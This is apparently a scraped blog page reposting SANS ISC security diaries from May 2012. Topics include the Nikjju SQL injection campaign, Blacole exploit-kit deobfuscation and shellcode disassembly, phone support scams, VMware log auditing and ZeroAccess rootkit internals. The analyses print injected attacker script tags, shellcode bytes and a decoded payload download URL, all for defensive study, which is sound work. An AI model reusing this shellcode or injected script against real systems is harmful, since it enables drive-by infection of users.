Počet zobrazení stránky

neděle 6. května 2012

Continued interest in Nikjju mass SQL injection campaign


Readers continue to write in conveying updates from sourcesregarding the Nikjju mass SQL injection campaign. Like the Lilupophilupop campaign from December, ASP/ASP.net sites are target and scripts inserted.
Be wary of <script src= hxxp://nikjju.com/r.php ></script> or <script src = hxxp://hgbyju.com/r.php <</script> and the resulting fake/rogue AV campaigns they subject victims to.
Infected site count estimations vary wildly but a quick search of the above strings will give you insight. Handler Mark H continues to track this one and indicates that the MO is similar to the lihupophilupop campaign but that they're trying some interesting things this round. We'll report if anything groundbreaking surfaces.
As always if you have logs to share send them our way via the contact form or any comment with any insight you want to share with readers.

OpenSSL reissues fix for ASN1 BIO vulnerability


OpenSSL has posted an updated advisory today indicating the fix for CVE-2012-2110 released on 19APR2012 was not sufficient to correct the ASN1 BIO vulnerability issue for OpenSSL version 0.9.8.
Please note that this latest issue only affects OpenSSL 0.9.8v.  OpenSSL 1.0.1a and 1.0.0i already contain a patch as released on the 19th sufficient to correct CVE-2012-2110.
Please upgrade to 0.9.8w.

Blacole's obfuscated JavaScript


Looking back on how we used to analyze malicious JavaScript five years ago, it is quite amazing to see the "evolution" of code obfuscation that the bad guys went through.
Most of the current obfuscation methods make heavy use of objects and functions that are only present in the web browser or Adobe reader. Since it is unlikely that a JavaScript analysis engine on, for example, a web proxy anti-virus solution can duplicate the entire object model of Internet Explorer, the bad guys are hoping that automated analysis will fail, and their JavaScript will make it past the virus defenses to the user's browser, where it will run just fine.
Often, this actually works. The current wave of Blackhole (Blacole) exploit kits are a good example - it took Anti-Virus a looong time to catch on to these infected web sites. Even today, the raw malicious JavaScript block full of exploit attempts comes back with only 14/41 on Virustotal
 
Here's what the Blacole obfuscated Javascript looks like:
Unlike "older" obfuscation methods, this "Blacole" encoding is almost human readable again. But automated analysis still has a tough time with it, because the code is heavy on browser objects and function prototypes:
 
None of this will run in command line JavaScript interpreters like "SpiderMonkey". Analysis environments like Cuckoo and Wepawetare doing a pretty good job at this, but often also trip up.
If all else fails, while manual analysis of the code is tedious, it usually leads to the desired result. A bit further down in the JavaScript block, we find
This looks like a loop over the code block that replaces/transposes characters based on their ASCII code. If the ASCII Code is >25 and <52, 26 gets added to it. If it is >=52 and <78, 26 gets subtracted. Otherwise, the ASCII code remains unchanged. This is like a "poor man's Caesar Cipher", swapping out one letter against another.
Something we can readily reproduce in a couple lines of Perl :)
$cat decode.pl
#!/usr/bin/perl -w
while (<>) {
  for ($i=0; $i<length($_); $i++) {
    $c=substr($_,$i,1);
    $o=ord($c);
    if (($o>25) && ($o<52)) {
      $k=$o+26;
    } elsif (($o>=52) && ($o<78)) {
      $k=$o-26;
    } else { $k=$o };
    print chr($k);
  }
}
And, lo and behold:
$cat malscript.js | ./decode.pl

The decoding is not yet complete (there are a couple more steps in this obfuscation), but the name and location of one of the EXEs is already apparent.

Thanks to ISC reader Jan for the sample.

Blacole's shell code


Let's assume you finished the analysis of Blacole's obfuscated Javascript (see my earlier diary today), and you are still left with a code block like this

and you wonder what it does. The first step in Shell Code analysis is to "clean it up", in the case at hand here, we have to remove those spurious "script" tags
because they would trip us up in any of the following steps.
Once we're left with only the actual unicode (%uxxyy...) , we can turn this into printable characters:
$ cat raw.js | perl -pe 's/%u(..)(..)/chr(hex($2)).chr(hex($1))/ge' > decoded.bin
$ cat decoded.bin | hexdump -C
00000000 41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 |AAAAf.äüüë.X1Éf.|
00000010 e9 57 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff |éWþ.0(@âúë.èëÿÿÿ|
00000020 ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 |­Ì].Áw.èL£h.£h$£|
00000030 58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 |X4~£^ .óN£v.+\..|
00000040 a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 |©Æ=8××.£h.ën..]Ó|
[...]
This doesn't result in anything all that useful yet. Shellcode is in assembly language, so it wouldn't be "readable" in a hex dump anyway. But since most shellcode just downloads and runs an executable .. well, the name of the EXE could have been visible. Not in this case, because the shellcode is .. encoded one more time :).
Next step: Disassemble.
The quickest way to do so from a Unix command line (that I'm aware of) is to wrap the shell code into a small C program, compile it, and then disassemble it:
$ cat decoded.bin | perl -ne 's/(.)/printf "0x%02x,",ord($1)/ge > decoded.c
results in
0x41,0x41,0x41,0x41,0x66,0x83,0xe4,0xfc,0xfc,0xeb,0x10,0x58,0x31,0xc9 [...]
which is the correct format to turn it into
$ cat decoded.c
unsigned char shellcode[] = {
0x41,0x41,0x41,0x41,0x66,0x83,0xe4,0xfc, [...] }
int main() { }
which in turn can be compiled:
$ gcc -O0 -fno-inline decoded.c -o decoded.obj
which in turn can be disassembled:
$ objdump -M intel,i386 -D decoded.obj > decoded.asm
and we are left with a file "decoded.asm". This file will contain all the glue logic that this program needs to run on Unix .. but we're not interested in that. The only thing we're after is the disassembled contents of the array "shellcode":
0000000000600840 <shellcode>:
 600840:       41                      inc    ecx
 600841:       41                      inc    ecx
 600842:       41                      inc    ecx
 600843:       41                      inc    ecx
 600844:       66 83 e4 fc             and    sp,0xfffffffc
 600848:       fc                      cld
 600849:       eb 10                   jmp    60085b <shellcode+0x1b>
 60084b:       58                      pop    eax
 60084c:       31 c9                   xor    ecx,ecx
 60084e:       66 81 e9 57 fe          sub    cx,0xfe57
 600853:       80 30 28                xor    BYTE PTR [eax],0x28
 600856:       40                      inc    eax
 600857:       e2 fa                   loop   600853 <shellcode+0x13>
 600859:       eb 05                   jmp    600860 <shellcode+0x20>
 60085b:       e8 eb ff ff ff          call   60084b <shellcode+0xb>
 600860:       ad                      lods   eax,DWORD PTR ds:[esi]
 600861:       cc                      int3
 600862:       5d                      pop    ebp
 [...]
A-Ha! Somebody is XOR-ing something here with 0x28 (line 600853).  If we look at this in a bit more detail, we notice an "odd" combination of JMP and CALL.
Why would the code JMP to an address only to CALL back to the address that's right behind the original JMP ? Well .. The shell code has no idea where it resides in memory when it runs, and in order to XOR-decode the remainder of the shellcode, it has to determine its current address. A "CALL" is a function call, and pushes a return address onto the CPU stack. Thus, after the "call 60085b" instruction, the stack will contain 600860 as the return address. The instruction at 60084b then "pops" this address from the stack, which means that register EAX now points to 600860 .. and xor [eax], 0x28 / inc eax then cycle over the shellcode, and XOR every byte with 0x28.
Let's try the same in Perl:
$ cat decoded.bin | perl -pe 's/(.)/chr(ord($1)^0x28)/ge' > de-xored.bin
$ hexdump -C de-xored.bin | tail -5
00000190 0e 89 6f 01 bd 33 ca 8a 5b 1b c6 46 79 36 1a 2f |..o.½3Ê.[.ÆFy6./|
000001a0 70 68 74 74 70 3a 2f 2f 38 35 2e 32 35 2e 31 38 |phttp://85.25.18|
000001b0 39 2e 31 37 34 2f 71 2e 70 68 70 3f 66 3d 62 61 |9.174/q.php?f=ba|
000001c0 33 33 65 26 65 3d 31 00 00 28 25 0a             |33e&e=1..(%.    |
Et voilà, we get our next stage URL.
If you want to reproduce this analysis, you can find the original (raw.js) shellcode file on Pastebin.

Who's tracking phone calls that target your computer? Stay Tuned to the ISC


The story I am about to tell is similar to the diaries posted by Rob VandenBrink in July 2010,  Mark Hofman in May of 2011 andDaniel Wesemann in March of 2012.  This past week I got a call from someone that I thought was a regular old telemarketer until they said they were from a company in Texas providing Microsoft Support.  The caller had a very thick Indian accent.  I played along like a dumb user (the lady kept getting very angry with me when I asked her to repeat things and said I didn't understand:)  I got to look at my logs by running "eventvwr" from run line prompt. In my application logs, I found out that warning and error messages were really "viruses" and I should not click on them because they would multiply and destroy my mother board.  I also got to run "inf virus", which just opens the Window's inf folder and disregards the word "virus", and was asked if I downloaded those files.  Of course I said no and she told me they were viruses and all sorts of evil things that had been downloaded to my computer.  She then said that Microsoft had developed a very special software that would take care of all of this for me and she would help me.  She asked me to now type "www.logmein123.com" at the run line.  At this point, 40 minutes later, I told her I had to go somewhere.  I asked if I could call her back because I sure didn't want all that stuff on my computer.  She said I could and gave me the number 773-701-5437 and said her name was Peggy.  I didn't have time to finish the call, but I sure would have like to have gotten a VM fired up and see what "special software" she had for me to install.
After the call, I started researching this type of scam and was surprised to see it seemed to be dating back to the 2009 time frame.  However, I could not find any statistics that were tracking this data.  Maybe I am just looking in the wrong place.  I saw guidance from contact your local law enforcement to send an email to antiphishing.org.  I checked antiphishing.org and could not find any data on this trend nor is there any mention in their report released 26 April 2012 that summarized 2H2011.  It states "This report seeks to understand trends and their significances by quantifying the scope of the global phishing problem. Specifically, this new report examines all the phishing attacks detected in the second half of 2011 (“2H2011”, July 1, 2011 through December 31, 2011)."   This type of phishing is something APWG doesn't appear to track at this time.
I consider these calls to still be phishing attempts because according to APWG, phishing is defined as "Phishing is a criminal mechanism employing both social engineering and technical subterfuge to steal consumers’ personal identity data and financial account credentials."  The delivery vector is not email in this case but rather a phone call.  The end result is still the same.  So, where does that leave us for tracking the trend of fake calls whose target is your computer?
At this point in time, there is no central tracking of this type of delivery vector.  However, stay tuned to the ISC.  After discussing this with some of the other handlers, the ISC is going to set up a method for reporting these attempts to us for tracking and trending this delivery method.  More will be posted in the near future as soon as the details are worked out.

UPDATE:  The page for reporting these types of calls is now available at isc.sans.edu/reportfakecall.html.  Please let us know what you think and if we have missed anything.

Workaround for Oracle TNS Listener issue released !


Just a quick update to Johannes's story on the 27th about the Oracle TNS listener vulnerability ( http://isc.sans.edu/diary.html?storyid=13069 )

We received two updates from our readers on this today:
Reader "anothergeek" posted a comment to Johannes's story, noting that Oracle released a workaround today (Apr 30) - find details here ==>http://www.oracle.com/technetwork/topics/security/alert-cve-2012-1675-1608180.html

Shortly after, reader R.P. pointed us to a page that had proof of concept ( with a video no less) ==> http://eromang.zataz.com/2012/04/30/oracle-database-tns-poison-0day-video-demonstration/


So get that maintenance window scheduled folks!  Those patches don't do you any good in your Downloads folder!

From the perspective of someone who does audits and assessments, it's a sad thing to note that in many organizations it's tough to schedule maintenance on a large Oracle server.  So many applications get piled on these that database and operating system patches can be a real challenge to book, because an interruption in service can affect dozens or hundreds of applications.

Sadly this means that database patches are often quarterly or annual events.  Or "fairy tale events" (as in never-never).

FCC posts Enquiry Documents on Google Wardriving


Remember back in 2010, Google was in hot water for some wardriving activities, where personal information was gathered from unencrypted  wireless networks found during it's Streetview activities?  Deb wrote this up here ==> https://isc.sans.edu/diary.html?storyid=8794

Well, it looks like the discussion won't die - the FCC has just posted a summary of its findings here, along with some good background and a chronology of events in their investigation ==> http://transition.fcc.gov/DA-12-592A1.pdf

You'll notice that it's heavily redacted.  A version with much less redacting can be found here ==>http://www.scribd.com/fullscreen/91652398

It's very interesting reading.  What I found most interesting in the paper was:
  • I thought it was sensible that the engineer didn't go write a new tool for this - they used Kismet to collect the data, then massaged Kismet’s output during their later analysis. Aside from the fact that anyone who's been in almost any SANS class would realize how wrong using the tool was, at least they didn't go write something from scratch.
  •  Page 2 outlines the various radio licenses held by Google.  This caught my eye mostly because I'm in the process of studying up for my own license. 
  • The suggestion and implementation for the data collection in the controversy came from unnamed engineers ("Engineer Doe" in the paper).  I found it really interesting how the final "findings" document doesn't name actual names - I'd have thought that assigning responsibility would be one of the main purposes of this doc, but hey, what do I know?
  • Engineer Doe actually outlined in a design document how the tool would collect payloads (page 10/11), but then discounted the impact because the Streetview cars wouldn't "be in close proximity to any given user for an extended period of time".  The approval for the activity came from a manager who (as far as this doc is concerned) didn't understand the implications of collecting this info, or maybe didn't read the doc, or missed the importance of that section  - though a rather pointed question about where URL information was coming from was lifted out of one critical email.
Needless to say, violating Privacy Legislation "just a little bit" is like being a little bit pregnant - the final data included userids, passwords, health information, you name it.  As they say "close only counts in horseshoes and hand grenades" - NOT in Compliance to Privacy rules !

Long story short, this document outlines how the manager(s) of the project trusted the engineers word on the legal implications of their activity.  I see this frequently in my "day job".  Managers often don't know when to seek a legal opinion - in a lot of cases, if it sounds technical, it must be a technical decision right?  So they ask their technical people.  Or if they know that they need a legal opinion, they frequently don't have a budget to go down this road, so are left on their own to take their best shot at the "do the right thing" decision.  As you can imagine, if the results of a decision like this ever comes back to see the light of day, it seldom ends well.   Though in Google's case, they have a legal department on staff, and I'd imagine that one of their primary directives is to keep an eye on Privacy Legislation, Regulations and Compliance to said legislation.  Though you can't fault the legal team if the question never gets directed their way  (back to middle managment).

From a project manager point of view, this nicely outlines how expanding the scope of a project without the approval of the project sponsor is almost always a bad idea.  in most cases I’ve seen, the implications of changing the scope are all around impacts to budget and schedule, but in this case, a good idea and a neat project (Google Streetview) ended up being associated with activity that ended up being deemed illegal, which is a real shame.  From a project manager's perspective, exceeding the project scope is almost as bad a failure as not meeting the scope.   Exceeding the scope means that either you exceeded the budget or schedule, mis-estimated the budget or schedule, or in this case didn't get the legal homework done on the scope overage.

Take a minute to read the FCC doc (either version).  It's an interesting chronology of a technical project's development and execution, mixed in with company politics, legal investigation and a liberal sprinkling of "I don't recall the details of that event" type statements.  Not the stuff that blockbuster movies are made of, but interesting nonetheless !

We invite your opinions, or any corrections if I've mis-interpreted any of this - please use our COMMENT FORM.  I've hit the high points, but I'm no more an lawyer than "Engineer Doe"

Comments open for NIST-proposed updates to Digital Signature Standard


The comment period for National Institute of Standards and Technology (NIST) proposed changes to the Digital Signature Standard (FIPS 186-3) is open until May 25, 2012. Submit comments via  fips_186-3_change_notice at nist dot gov, with ''186-3 Change Notice'' in the subject line.
The proposed changes include:
  • "clarification on how to implement the digital signature algorithms approved in the standard: the Digital Signature Algorithm (DSA), the Elliptic Curve Digital Signature Algorithm (ECDSA) and the Rivest-Shamir-Adelman algorithm (RSA)"
  • "allowing the use of additional, approved random number generators, which are used to generate the cryptographic keys used for the generation and verification of digital signatures"
NIST indicates that "the standard provides a means of guaranteeing authenticity in the digital world by means of operations based on complex math that are all but impossible to forge" but that "updates to the standard are still necessary as technology changes."
Comment and feedback on your digital signature implementations are welcome via our comments form.

An Impromptu Lesson on Passwords ..


I was reading the other night, which since I've migrated my library means that I was on my iPad.
My kid (he's 11) happened to be in the room, playing a game on one console or another.  I'm deep in my book, and he's deep in his game, when he pipes up with "Y'know Dad?"
"Yea?"
"You should enable complex passwords on your tablet"
(Really, he said exactly that!  I guess he was in Settings / Security and wasn't playing a game after all ! )
"Why is that?" I said - (I'm hoping he comes up with a good answer here)
"Because if somebody takes your tablet, it'll be harder for them to guess your password"  (good answer!)
"Good idea - is there anything else I should know?"
"If they guess your password wrong 10 times, your tablet will get wiped out, so they won't get your stuff"  (Oh - bonus points!)
So aside from me having a really proud parent moment, why is this on the ISC page?  It's really good advice, that's why !
It's surprising how many people use the last 4 digits of their phone number, their birthday, or worse yet, their bank card PIN (yes, really) for a password, or have no password at all.  And yet, we have all kinds of confidential information on our tablets and phones - mostly in the form of corporate emails and sometimes documents.
As is the case in so many things, when we in the security community discuss tablet security, it's usually about the more advanced and interesting topics like remote management, remote data wipe or forensics.  These are valuable discussions - but in a lot of cases, basic (and I mean REALLY BASIC) security 101 advice to our user community will go a lot further in enhancing our security position.  Advice like I got from my kid:
  • Set a password !
  • Make sure that it's reasonably complex (letters and numbers)
  • Make sure that it's not a family member name, phone number, birthday, bank PIN or something that might be found on your facebook page
  • Set a screen saver timeout
  • Set the device to lock when you close the cover
  • Delete any documents that you are finished with - remember, the doc on your tablet is just an out of date copy
This may seem like really basic advice, and that's because it is.  But in the current wave of BYOD (Bring Your Own Device) policies that we're seeing at many organizations, we're seeing almost zero attention put on the security of the organization's data.  BYOD seems to be about transferring costs to our users on one hand, and keeping them happy by letting them use their tablets and phones at work (or school).
Good resources for iPad security (as well as Android and other tablets also) can be found in the SANS Reading Room (http://www.sans.org/reading_room/ )
Vendors also maintain security documentation - Apple has some good (but basic) guidance at ==>http://www.apple.com/ipad/business/docs/iPad_Security.pdf
Please, use our COMMENT FORM to pass along any tablet security tips or links you may have.

Monitoring VMWare logs


Virtualization is so popular today that there is almost no company that does not use a virtualization platform. VMWare is definitely the most popular one (at least the most popular one I seem to be running into).
It is also not uncommon to see VMWare farms growing exponentially as people tend to throw more hardware and just create new VMs. In such cases, controlling what your administrators do is a must yet I also see that organizations auditing their VMWare farms (and especially administrator’s activities) are pretty rare.
One of the problems is that reviewing VMWare logs can be complex so it is not easy to setup the whole log collection and analysis system correctly; this is something a lot of SIEM’s and similar log collection and analysis tools fail at. So let’s see what we have to work with here and how we can improve things.
System components
For the sake of this diary, I’ll write mainly about the “typical” setups today that consist of ESXi (or ESX, for older setups) host servers and one or more vCenter management servers.
ESXi is VMWare’s host operating system that actually runs the virtual machines. It is highly optimized and has a footprint of only 150 MB. This is what is usually installed on those big servers that today run 20+ virtual machines.
Of course, when you have more than one ESXi server, you want to manage it centrally, not only to make management easier but to also allow some more sophisticated processes such as vMotion and similar. This management is done through a vCenter server.
vCenter basically just runs on a normal Windows operating system machine that itself can be a VM as well. Administrators normally use the VMWare vSphere client application to connect to vCenter and to manage virtual machines (of course, depending on their role and permission).
The same client (vSphere client) can be used by an administrator to connect directly to an ESXi server and to manage VMs that are hosted on that server. As you can probably guess, this creates problems for activity auditing since, in this case, any changes are performed directly on the ESXi host server so vCenter will not see those activities directly.
Finally, if you are trying to troubleshoot some problems, you can allow SSH access directly to the ESXi hosts – this access is disabled by default, but I found it quite often that organizations enable it and leave it enabled.
Log collection
We can see that there are multiple system components that generate logs that we should be collecting. While vCenter keeps its own logs and allows reviews from the console, ESXi hosts will also independently keep their logs that should be audited. Actually, when an administrator modifies something in vCenter, a task will be created that will cause vCenter to connect to the target ESXi host and issue the change.
At the moment I’m usually recommending clients to collect logs from the following components:
What I’ve found is that the VMWare SDK API allows much easier retrieval of logs that will be nice and structured but, if your SIEM does not support it directly, you will have to code a script to retrieve such logs yourself.
Of course, do not forget about the OS logs as well as the database logs – since this server is the most important one, make sure that you’ve protected it accordingly and that you collect all other log files that might be important.
  • ESXi host logs are also very important since an administrator can connect directly to them (unless this has been prevented). With ESXi there aren’t many options and probably the best one is to configure a local Syslog to send logs to the central Syslog server, as shown in the picture below.
VMWare Syslog settings

Keep in mind, though, that VMWare creates many multi-line logs which will eventually be broken due to size limits of Syslog so correlating them on the server side might be quite a bit difficult, if not impossible.
By using Syslog we will also take care of SSH logins, since these will be logged by the console and sent through Syslog to the central server.
Auditing
Now that we have all the logs at one place, we can correlate them and setup alerts on suspicious activities.
Regular log reviews are very important. One of the things you should particularly take a look at is console access. For example, if the administrator that accessed a server’s console through vCenter forgot to logout, any other vCenter administrator can access that server’s console (if he has vCenter permissions to access it, of course).
Good log collection and correlation (remember to collect both vCenter logs as well as logs from all your guest servers) can tell you which server’s consoles were accessed as well as if the administrator had to log in or not.
So check your VMWare environments today and see if you can answer these questions: who, from where and when logged in to my vCenter console, which VMs were migrated and which consoles have been accessed by which administrator in last 30 days?

Let us know what your experiences with collecting and analyzing VMWare logs are and if you did something you’d like to share with our readers so everyone can benefit from your work.

Are Open SSIDs in decline?


After hearing about my wife's iPad disconnecting from wireless for a couple of weeks (ok, maybe a bit longer than that), I decided to do some upgrades to the home network and replace the problem Access Point (and older home unit).
So off to the store I went, and came home with a bright shiny new A/B/G/N AP.  After throwing the DVD away (you know, the one that comes in every box with the outdated firmware on it), and updating the unit to the current rev, my kid and I started setting it up.

It's been a while since I worked on a standalone AP - my builds normally involve controllers and *lots* of AP's.  So imagine my surprise and joy when I found that these home units no longer default to an SSID with a default name and no security!  This one started the setup by defaulting to WPA-2 / Personal, and asked me what I wanted to use for a key !  You really have to be determined now to create an Open SSID ( good news ! )

So are we looking the long, slow goodnight of open wireless on home networks?  I've written in the past about how tablet users that don't know better routinely "steal" wireless from whoever is close without thinking twice - is this going to get harder and harder from them over the next few years, as people migrate to newer APs?
On the other hand, we're seeing more and more guest networks that are open, things like coffee shops, municipal offices, hair salons - pretty much anyplace you're likely to spend more than 5 minutes at seems compelled to offer up free wireless.  But using free wireless that's offered to you is a much different proposition than stealing it from someone who's misconfigured their home network..

I invite your comments - my AP's name starts with and L and ends with an S (made by our friends at C***o).  Are the current models from other vendors implementing better defaults now too?  

Helping the helpdesk help you


What happens when your helpdesk gets a call from a frantic staff member who’s positive his computer is being hacked by Government X this very second?

The IT helpdesk is the face, voice or automated greeting that most staff and/or customers get to deal with when calling for help*. Most IT helpdesk staff have run sheets or scripts to walk the caller through common problems or perform basic tests. With scripts and the frequency of typical requests, helpdesk staff can become very slick and effective making everyone lives easier.  But what happens when a call comes through and it might be a security issue?
Here are some questions to pose to your organisation:
  1. Has there ever been any discussion between the helpdesk and security teams on what should be done if the call is security related?
  2. Is this scalable in time and work load to get every security related possible call routed to the security team answer?
  3. Should the IT helpdesk staff be provided scripts for basic security procedures other than “Tell them to touch nothing and you call me!”?
Each work place and environment has its own unique factors on how security related call are handled but let’s imagine the security team doesn’t want to field every call that may or may not be anything to do with a security issue. This is where a helpdesk team could, with guidance and coaching, be invaluable in saving time and effort to all parties.
A crucial first step is to define what the helpdesk should do and what they should definitely not do. This sets clear lines of demarcation, stopping any misunderstanding that can occur in the heat of the moment with someone attempting to do what they believe is the right thing and it ends up causing an awful mess.

On the “do” lists are:
- Get a clear description of the problem
- Provide standard details on the caller (username, computer details, IP address, location and so on)
- Record only the facts.

On the “should not do” lists are:
- Connect to the system to try and fix it themselves
- Offer advice on how to fix the problem
- Jump to unsupported conclusions
- Any other actions that may cause harm or impact.

From this point onwards both the security and helpdesk teams have some ground rules and can work together without causing problems.

Feel free to add any comments, thoughts or suggestions on your experiences, good or bad, on solving this problem.

Chris Mohan--- Internet Storm Center Handler on Duty

* Help – this covers actual questions on topics the IT helpdesk staff are trained in rather than those random questions such as why isn’t the fridge working. In case you were wondering, the correct answer was the fridge’s fuse had blown. Obvious really...

Vulnerability Assessment Program - Discussions

On a slow Saturday in May I thought I would open the forum for discussion here at the ISC on a topic.  I am working on a project to update the Continuous Vulnerability Assessment (CVA) capability for a client, and I have found a lot of good information on the web.  What I haven’t found a lot of is good experiences on the web.  Guy Bruneau wrote a great article in October onCVA and Remediation for the Critical Controls discussed in October.

First off what is a vulnerability assessment?  Wikipedia defines a vulnerability assessment as “the process of identifying, quantifying, and prioritizing (or ranking) the vulnerabilities in a system”.  Vulnerability assessments are often confused with penetration testing, however these two functions serve different roles in a the organization and the overall security assessment.  A CVA program, as a component of the overall enterprise systems management program, needs to consider the process for asset identification, vulnerability reporting and remediation.   

Information I have collected runs the gamut  of technical and marketing information.  A great report on assessment tools is available here.  Search the web for “Vulnerability Assessment”, “Continuous  Vulnerability Assessment”, or “CVA” and the results range greatly.  Technical, marketing, best practices, etc., but what is not abundant is experiences.  What I’m asking of you today is input on experiences and challenges that you've encountered in your implementation or update of a CVA program. I’d love to hear about both the technical and environmental challenges encountered along the way.  Ask yourself “If I had to do it differently, what would I change?”; that’s what I would like to hear.

úterý 1. května 2012

Are Open SSIDs in decline?


After hearing about my wife's iPad disconnecting from wireless for a couple of weeks (ok, maybe a bit longer than that), I decided to do some upgrades to the home network and replace the problem Access Point (and older home unit).
So off to the store I went, and came home with a bright shiny new A/B/G/N AP.  After throwing the DVD away (you know, the one that comes in every box with the outdated firmware on it), and updating the unit to the current rev, my kid and I started setting it up.

It's been a while since I worked on a standalone AP - my builds normally involve controllers and *lots* of AP's.  So imagine my surprise and joy when I found that these home units no longer default to an SSID with a default name and no security!  This one started the setup by defaulting to WPA-2 / Personal, and asked me what I wanted to use for a key !  You really have to be determined now to create an Open SSID ( good news ! )

So are we looking the long, slow goodnight of open wireless on home networks?  I've written in the past about how tablet users that don't know better routinely "steal" wireless from whoever is close without thinking twice - is this going to get harder and harder from them over the next few years, as people migrate to newer APs?
On the other hand, we're seeing more and more guest networks that are open, things like coffee shops, municipal offices, hair salons - pretty much anyplace you're likely to spend more than 5 minutes at seems compelled to offer up free wireless.  But using free wireless that's offered to you is a much different proposition than stealing it from someone who's misconfigured their home network..

I invite your comments - my AP's name starts with and L and ends with an S (made by our friends at C***o).  Are the current models from other vendors implementing better defaults now too?

LAN Messenger <= v1.2.28 Denial of Service Vulnerability



Mikrotik Router Denial of Service



OpenCart 1.5.2.1 Multiple Vulnerabilities



GENU CMS 2012.3 - Multiple SQL Injection Vulnerabilities



Wordpress Zingiri Web Shop Plugin <= 2.4.2 Persistent XSS



MyClientBase v0.12 - Multiple Vulnerabilities



STRATO Newsletter Manager Directory Traversal



SAMSUNG NET-i Viewer 1.37 SEH Overwrite



McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject Vulnerability



McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 ActiveX Control GetObject() Security Bypass Remote Code Execution



Is ‘SexyDefense’ The Future of Anti-Espionage?


At the recent SOURCE Boston conference, one presentation that caught my attention was calledSexyDefense - Maximizing the home-field advantage.
This was quite a thought-provoking presentation that was based on the old concept that offense is always the best defense.
Basically, the idea is to profile your attacker(s) and subsequently modify their attack tools to something that you can silently detect. The premise is that they continue to use their attack tool because they believe they are going undetected.
During the talk, the speaker gave one example of a cryptor which had been marketed as fully undetectable. In reality, there was an anti-virus program which did detect files crypted using this cryptor. As a result, they hacked the server, modified the cryptor to make it truly undetectable statically and added silent detection/protection at their end.
Obviously, there are some very clear ethical and legal issues with this approach.
Those issues aside, this approach forces us to ponder the question: Is this the possible future in the (anti-)espionage era?
When dealing with cyber-espionage you can never have enough intelligence. And this approach is certainly a very interesting one to go about gathering more intel.
I'm not a fan of using vigilante tactics. But as more companies and industries grow increasingly frustrated with cyber-espionage/APT, I do expect to see an increase in the adoption of using offense as defense.
Interesting times.

Targeting ZeroAccess Rootkit’s Achilles’ Heel


Proliferation

ZeroAccess is one of the most talked and blogged,[1][2] about rootkits in recent times. It is also one of the most complex and highly prevalent rootkits we have encountered, and it is continuing to evolve. The ZeroAccess rootkit is distributed via both social engineering as well as by exploitation. A recent blog post by our colleagues at McAfee describes some of the odd methods this rootkit adopts to get installed on machines without getting noticed.
One of the goals of this rootkit is to create a powerful peer-to-peer botnet, which is capable of downloading additional malware on the infected system. This botnet is reportedly [3]involved in click fraud, downloading rogue antivirus applications, and generating spam.
This Google map of the United States shows McAfee VirusScan consumer nodes reporting unique ZeroAccess detections during the past week.
Our consumer data for the past month shows close to 4,000 unique systems detecting ZeroAccess daily. And the trend is continuing upward.

Installation

In my recent analysis of this rootkit, I wanted to understand its initial installation mechanism. The installation of ZeroAccess involves overwriting a legitimate driver on disk with the malicious rootkit driver. Usually Step 1 varies in different variants. Some variants directly overwrite a legitimate driver and others first inject the malicious code in trusted processes like explorer.exe and then, from the injected code, overwrite the driver (this is done to bypass various security products and to make analysis more challenging). During Step 1, the original driver code is kept in memory. The driver that is overwritten in Step 2 is randomly selected (details here[1]). In our discussion below we assume CDROM.sys is being overwritten. Step 2 to Step 8 are fairly static in variants of ZeroAccess. Once the driver is overwritten by malicious code, it is loaded in kernel space. The first task of the kernel mode code is to ensure that it sets up the malware to survive reboots and to forge the view of overwritten driver (CDROM.sys).
Lets move on to see how this scheme works in Step 5 through Step 8. In Step 5,  ZeroAccess intercepts disk i/o by hooking the DeviceExtension->LowerDeviceObject field in the \driver\disk DEVICE_OBJECT. So now any disk i/o would go through the rootkit’s malicious routine. In Step 6, the kernel mode code has access to a clean image of the CDROM.sys driver stored in memory. To survive reboots it flushes the file to disk using the ZwFlushVirtualMemory API. The request to flush the clean image is, interestingly, sent to the file CDROM.sys, which at first glance looks counterintuitive. Why would the rootkit want to write the clean image to the file it just infected in Step 2?  Looking more closely, the rootkit actually uses its disk i/o redirection framework. So, when this request to store the clean image of the file on disk travels through the virtual driver stack shown in Step 7, it is encrypted and redirected (Step 8) to the rootkits “protected” folder that it created in Step 3, instead of going to the actual CDROM.sys.


Once the original encrypted image of CDROM.sys is stored in the protected folder, the infection becomes persistent and can easily survive reboots. Any attempt to read the infected CDROM.sys would have to traverse the hijacked i/o path, in which the rootkit on the fly decrypts the original file from its protected storage and presents the clean image, thus forging the view of the file to security tools. Also, during a reboot the infected file would first load the malicious code in kernel, which can refer to its “protected” folder, and load the original file in kernel, thus ensuring the uninterrupted functionality of the original device.
To clean this threat, security tools have to take several steps in repairing either memory or decrypting the file in its protected folder so that they can restore the original file. Also once the rootkit is active in kernel mode, it takes lot of evasive steps to kill or circumvent the security tools as described by our colleagues in this Virus Bulletin article. So repair becomes even more challenging and research more costly.

Impact of real-time kernel monitoring

I tested for more than a year many variants of this rootkit family against McAfee’s Deep Defender technology, which provides real-time protection against unauthorized kernel-memory modifications. The following screenshot shows Deep Defender blocking the DeviceExtension hijack attempt in Step 5, which was critical to the rootkit’s survival. Once this hook was blocked, the machine was cleaned after a reboot, without any fancy repairs. This move shaved off days of reverse engineering and writing custom repairs against this rootkit and its multiple variants. It seems Deep Defender has found the Achilles heel of this rootkit.

How did Deep Defender clean the machine?

You did not miss part of this article. The interesting point is that Deep Defender did not have to do any custom repairs to clean this threat. It just blocked in real time the core functionality of the rootkit. Let’s revisit the attack strategy to understand what happened.


When the rootkit attempted to hijack the DeviceExtension pointer in Step 5, Deep Defender’s real-time kernel-memory protection saw the attempted change and recognized it as a malicious attempt to modify a critical structure and blocked the hijack attempt. With the hook gone, the rootkit could not hijack the disk i/o path, which means it could not store any files in its “protected” folder and could not survive any reboots without getting noticed. It certainly cannot forge the view of the file anymore. But the most interesting part is that the attempted hijack block by Deep Defender actually redirected the rootkit’s write attempt in Step 7 to its original location. So Step 8 would actually overwrite the original file that it just infected from user mode, thus forcing the rootkit to clean up for us. After a reboot, the system will be back in the clean state.
This strategy from Deep Defender works against all the current  ZeroAccess variants. It would be challenging for the rootkit authors to fully bypass this defense without either leaving the system in a corrupted state or being noticed by security tools, which would catch them red handed if they could no longer forge the view of the file.